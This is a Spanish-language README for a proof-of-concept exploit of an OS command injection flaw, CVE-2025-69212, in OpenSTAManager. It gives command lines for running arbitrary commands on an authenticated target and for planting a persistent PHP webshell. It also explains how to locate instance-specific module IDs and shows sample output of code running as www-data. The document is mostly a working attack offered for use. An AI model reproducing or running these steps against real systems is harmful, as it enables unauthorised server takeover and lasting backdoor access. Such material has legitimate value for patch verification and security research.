
CVE-2025-69212 - OpenSTAManager Inyección de comandos del SO PoC
Instala las dependencias:
pip install -r requirements.txt
Ejecuta un comando único y muestra su salida:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
En su lugar, despliega una webshell persistente en PHP:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| Flag | Descripción |
|---|
-u, --url | URL base de la instancia objetivo |
-U, --username | Nombre de usuario para la autenticación |
-P, --password | Contraseña para la autenticación |
-c, --command | Comando a ejecutar, la salida se guarda en pwn_out.txt |
--shell | Despliega una webshell PHP en files/shell.php en lugar de ejecutar un solo comando |
--id-module | ID del módulo para la función de importación de facturas (por defecto: 14) |
--id-plugin | ID del plugin para la función de importación de facturas (por defecto: 48) |
id_module e id_plugin son específicos de la instancia. Si los valores predeterminados no funcionan, inicia sesión en la interfaz web del objetivo, navega hasta la función de importación de facturas electrónicas y verifica los parámetros de la solicitud en la pestaña de red de tu navegador.
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------